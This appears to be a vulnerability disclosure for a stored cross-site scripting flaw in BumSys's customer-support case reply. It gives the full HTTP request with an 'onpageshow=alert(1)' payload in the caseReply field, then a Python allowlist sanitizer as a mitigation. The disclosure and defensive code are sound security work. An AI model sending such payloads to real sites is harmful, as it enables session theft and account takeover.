An attacker can submit an XSS payload in a Customer Support case reply
Request Payload:
POST /xhr/?module=customer-support&page=addCaseReply HTTP/1.1
Host: demo.bumsys.org
Cookie: __80e72166c3164cd4e1f55b5348364ee4f8bc0d12=655mqrm2v9uhktlqpke0h026d4; eid=1; currencySymbol=%E0%A7%B3; keepAlive=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Csrf-Token: bfbfb6c2834e8b91b86a883cd6c2b4cf18d8ad65
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------3828905606458425251363531674
Content-Length: 570
Origin: https://demo.bumsys.org
Referer: https://demo.bumsys.org/customer-support/case-list/?case_id=2
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

-----------------------------3828905606458425251363531674
Content-Disposition: form-data; name="caseReply"

<h1>test</h1><body onpageshow=alert(1)>
-----------------------------3828905606458425251363531674
Content-Disposition: form-data; name="replyMode"

Public
-----------------------------3828905606458425251363531674
Content-Disposition: form-data; name="case_id"

2
-----------------------------3828905606458425251363531674
Content-Disposition: form-data; name="caseType"

Refund Request
-----------------------------3828905606458425251363531674--
Response:
The caseReply value is rendered as HTML (HTML injection) and the alert(1) fires (XSS).
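
Mitigation sketch, added here as an example and not taken from the BumSys code base: an allowlist sanitizer applied to the caseReply value before it is stored or rendered. It assumes replies may carry a little formatting; the tag allowlist and the names ReplySanitizer and sanitize_reply are hypothetical, and Python is used only for illustration.

```python
from html import escape
from html.parser import HTMLParser

# Assumed allowlist of formatting tags for a support reply (not from BumSys).
ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "br", "ul", "ol", "li", "h1", "h2"}
VOID_TAGS = {"br"}


class ReplySanitizer(HTMLParser):
    """Rebuilds markup from parser events, keeping only allowlisted tags."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []

    def handle_starttag(self, tag, attrs):
        # Disallowed tags (body, script, img, ...) are dropped entirely.
        if tag not in ALLOWED_TAGS:
            return
        # attrs is ignored on purpose: no event handler (onpageshow=...),
        # style or URL attribute is ever written back out.
        self.out.append(f"<{tag}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        # Only close tags this sanitizer opened, so output stays well formed.
        if tag in self.open_tags:
            while self.open_tags:
                opened = self.open_tags.pop()
                self.out.append(f"</{opened}>")
                if opened == tag:
                    break

    def handle_data(self, data):
        # All text is entity-encoded on the way out.
        self.out.append(escape(data, quote=True))


def sanitize_reply(raw: str) -> str:
    parser = ReplySanitizer()
    parser.feed(raw)
    parser.close()
    while parser.open_tags:  # close anything the input left open
        parser.out.append(f"</{parser.open_tags.pop()}>")
    return "".join(parser.out)


if __name__ == "__main__":
    # The caseReply value from the request above.
    print(sanitize_reply("<h1>test</h1><body onpageshow=alert(1)>"))
```

If replies are meant to be plain text only, entity-encoding the whole value at output time is the simpler fix and the allowlist is unnecessary.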